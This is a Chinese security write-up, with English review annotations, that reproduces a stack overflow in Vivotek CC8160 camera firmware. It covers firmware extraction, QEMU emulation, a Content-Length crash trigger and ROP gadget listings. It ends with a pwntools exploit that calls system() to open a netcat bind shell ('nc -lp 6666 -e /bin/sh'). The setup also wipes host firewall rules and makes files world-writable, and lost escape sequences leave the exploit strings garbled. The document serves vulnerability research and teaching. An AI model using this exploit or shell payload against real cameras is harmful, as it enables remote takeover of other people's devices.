一、固件提取
# Unpack the firmware image: -M recurses into anything extracted, -e extracts recognised
# sections. The squashfs-root directory used in the rest of the write-up presumably
# comes out of this step.
binwalk -Me CC8160-VVTK-0113b.flash.pkg
二、官方揭露阅读
三、环境搭建
# Host side, from inside the extracted root: first attempt to run the camera's httpd
# directly under qemu-user (qemu-arm-static) in a chroot. Note this runs the daemon as root.
sudo chroot . ./qemu-arm-static ./usr/sbin/httpd
# Compare the host's hostname with the chroot's hosts file; the two lines printed after
# these commands in the write-up appear to be their output, not further commands.
cat /proc/sys/kernel/hostname
cat ./etc/hosts
127.0.0.1 Network-Camera localhost
debian-armel
# Overwrite the extracted root's /etc/hosts so the guest hostname resolves to the address
# the emulated camera will get (the original entry is shown above).
echo "192.168.100.2 debian-armel localhost" > squashfs-root/etc/hosts
# Drop any stale copies of the Debian wheezy armel kernel/initrd used by qemu-system below.
rm -rf vmlinuz-3.2.0-4-versatile
rm -rf initrd.img-3.2.0-4-versatile
# NOTE(review): fetched over HTTPS but not checksum-verified; compare against a trusted
# hash before booting a kernel/initrd into the lab network.
wget https://people.debian.org/~aurel32/qemu/armel/vmlinuz-3.2.0-4-versatile
wget https://people.debian.org/~aurel32/qemu/armel/initrd.img-3.2.0-4-versatile
# Host side: create a tap device for the guest and NAT its traffic out through the uplink.
sudo ip tuntap add mode tap name tap0
sudo ip link set tap0 up
# Make the host forward packets for the guest (stays in effect until reset or reboot).
sudo sysctl -w net.ipv4.ip_forward=1
# NOTE(review): the next nine commands flush every rule and user chain in the filter, nat and
# mangle tables and set all three default policies to ACCEPT, i.e. the host's existing
# firewall is discarded. Acceptable only on a dedicated lab machine; restore the normal rule
# set when the exercise is over.
sudo iptables -F
sudo iptables -X
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -t mangle -F
sudo iptables -t mangle -X
sudo iptables -P INPUT ACCEPT
sudo iptables -P FORWARD ACCEPT
sudo iptables -P OUTPUT ACCEPT
# Masquerade guest traffic leaving through the uplink.
sudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE # replace ens33 with your own uplink interface name
# Forward anything arriving from the tap; only return traffic of established flows goes back to it.
sudo iptables -I FORWARD 1 -i tap0 -j ACCEPT
sudo iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT
# Host address on the lab subnet; the guest configures this as its default gateway below.
sudo ifconfig tap0 192.168.100.254 netmask 255.255.255.0
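# Boot the Debian wheezy armel guest that will host the camera's userland.
# The write-up printed one argument per line with no line continuations, so the command could
# not be pasted as-is (each argument line would run as a separate command); the arguments are
# collected in an array instead, which also allows a comment per element.
qemu_args=(
  -M versatilepb                            # board matching the "versatile" kernel/initrd names
  -kernel vmlinuz-3.2.0-4-versatile
  -initrd initrd.img-3.2.0-4-versatile
  -hda debian_wheezy_armel_standard.qcow2   # guest disk image (not fetched in this listing)
  -append "root=/dev/sda1"
  -net nic -net tap,ifname=tap0,script=no,downscript=no  # attach to the tap0 created above; no ifup/ifdown scripts
  -nographic                                # serial console on the current terminal
)
sudo qemu-system-arm "${qemu_args[@]}"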
# Inside the guest (no sudo; presumably logged in as root): static address on the tap subnet,
# with the host's tap0 address as default gateway.
ifconfig eth0 192.168.100.2 netmask 255.255.255.0
route add default gw 192.168.100.254
# Host side: copy the extracted root into the guest. NOTE(review): the user@host part is
# redacted in this copy ("[email protected]"); presumably the guest's root account at the
# address configured on eth0 above.
sudo scp -r squashfs-root/ [email protected]:/root
# Inside the guest, after the copy: first attempt to run the camera httpd in a chroot.
# NOTE(review): chmod -R 777 makes the whole extracted root world-writable; it is unlikely
# to be what chroot needs and should stay confined to a throwaway lab VM.
chmod -R 777 squashfs-root/
chroot ./squashfs-root/ /bin/sh
# Run inside the chroot shell started by the previous line.
./usr/sbin/httpd
# Second attempt: give the chroot a /proc and bind-mount the guest's /dev first (the daemon
# presumably needs them); note this exposes the guest's device nodes to the chrooted service.
mount -t proc /proc ./squashfs-root/proc
mount -o bind /dev ./squashfs-root/dev
chmod -R 777 squashfs-root/
chroot ./squashfs-root/ /bin/sh
# Run inside the chroot shell started by the previous line.
./usr/sbin/httpd
四、验证poc
# From the host: the crash trigger — a POST to the firmware-upgrade CGI whose Content-Length
# value is an over-long, non-numeric marker string. NOTE(review): the escape sequences appear
# to have been lost in this copy ("n"/"rn" where line endings would be). Detection: a
# request to /cgi-bin/admin/upgrade.cgi carrying a non-numeric or oversized Content-Length
# header is the pattern to alert on.
echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXXnrnrn" | netcat -v 192.168.100.2 80
# Inside the guest: attach gdbserver to the running httpd and listen on port 1234 for the host's gdb.
./gdbserver.armel --attach 192.168.100.254:1234 2440
# Read the process map to see where libc is loaded (the base address the exploit hard-codes).
# NOTE(review): this PID (2386) differs from the one attached above (2440) — presumably separate runs.
cat /proc/2386/maps
五、漏洞利用
lyyy@ubuntu:~/Desktop/vr/squashfs-root$ ROPgadget --binary ./lib/libc.so.0 --only "pop|ret"
Gadgets information
============================================================
0x00046428 : pop {fp, pc}
0x00033100 : pop {r0, pc}
0x00048784 : pop {r1, pc}
0x0000b490 : pop {r3, pc}
0x0000d71c : pop {r3, r4, r5, pc}
0x0000a46c : pop {r3, r4, r5, r6, r7, pc}
0x0000cf14 : pop {r3, r4, r5, r6, r7, r8, sb, pc}
0x0002cf58 : pop {r3, r4, r5, r6, r7, r8, sb, pc} ; pop {r3, r4, r5, r6, r7, r8, sb, pc}
0x000174c8 : pop {r3, r4, r5, r6, r7, r8, sb, sl, fp, pc}
0x0000b7c0 : pop {r3, r4, r7, pc}
0x0000ae00 : pop {r4, pc}
0x0000ddf0 : pop {r4, pc} ; pop {r4, pc}
0x0000abb8 : pop {r4, r5, pc}
0x0000a83c : pop {r4, r5, r6, pc}
0x0000aa64 : pop {r4, r5, r6, r7, pc}
0x0000b364 : pop {r4, r5, r6, r7, r8, pc}
0x0000a700 : pop {r4, r5, r6, r7, r8, sb, pc}
0x0000db64 : pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}
0x0000d110 : pop {r4, r5, r6, r7, r8, sb, sl, pc}
0x0000a97c : pop {r4, r5, r7, pc}
0x00042540 : pop {r4, r6, r7, pc}
0x0000b6e0 : pop {r4, r7, pc}
0x0000d320 : pop {r4, r7, pc} ; pop {r4, r7, pc}
0x0000a4ac : pop {r7, pc}
Unique gadgets found: 24
pop {r1,pc};==pop r1;ret
mov r0,r1;
0x00033100 pop r0 gadget地址带有\x00,漏洞使用strncmp,所以会有\x00截断
# Exploit PoC reproduced from the write-up (Vivotek CC8160, stack overflow in the upgrade
# CGI's handling of the Content-Length header). Code kept verbatim; review notes only.
# NOTE(review): libc_base and stack are the values observed in this emulated guest (see the
# /proc/<pid>/maps step above) and hold only for that environment; address randomisation or
# stack canaries on a target would break a fixed-address chain like this. The defensive fix
# belongs in the CGI: validate and bound the Content-Length value before it is presumably
# copied into a fixed-size stack buffer. Detection: POSTs to /cgi-bin/admin/upgrade.cgi whose
# Content-Length is non-numeric or oversized.
from pwn import*
import requests  # NOTE(review): unused in this listing
p=remote('192.168.100.2',80)  # the emulated camera (address set on the guest's eth0 above)
libc=ELF('./lib/libc.so.0')  # libc from the extracted squashfs root; used for the system() symbol offset
context.log_level='debug'
libc_base=0xb6f2d000  # hard-coded from the process maps of this guest
pop_r1=0x00048784+libc_base  # "pop {r1, pc}" offset from the ROPgadget listing above
mov_r0_r1=0x00016aa4+libc_base  # NOTE(review): not in the listing above (it was filtered with --only "pop|ret"); unverified here
system=libc_base+libc.sym['system']
stack = 0xbeffeb64  # author's note: where the shell command string sits on the stack
amd='aaaaaa'  # NOTE(review): unused
head = b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0nContent-Length:"  # NOTE(review): escape sequences appear lost in this copy ("n" where a line break should be); same for `end` below
payload = b'b'*(0x00003c-8)+p32(pop_r1)+p32(stack)+p32(mov_r0_r1)+b'b'*8+p32(system)  # padding up to the overwritten return address (per the author's layout), then the gadget chain
end = b'nc -lp 6666 -e /bin/sh;'+b'rnrn'  # command string handed to system(), then the header terminator
p.sendline(head+payload+end)
原文始发于微信公众号(山石网科安全技术研究院):Vivotek CC8160 固件栈溢出漏洞复现分析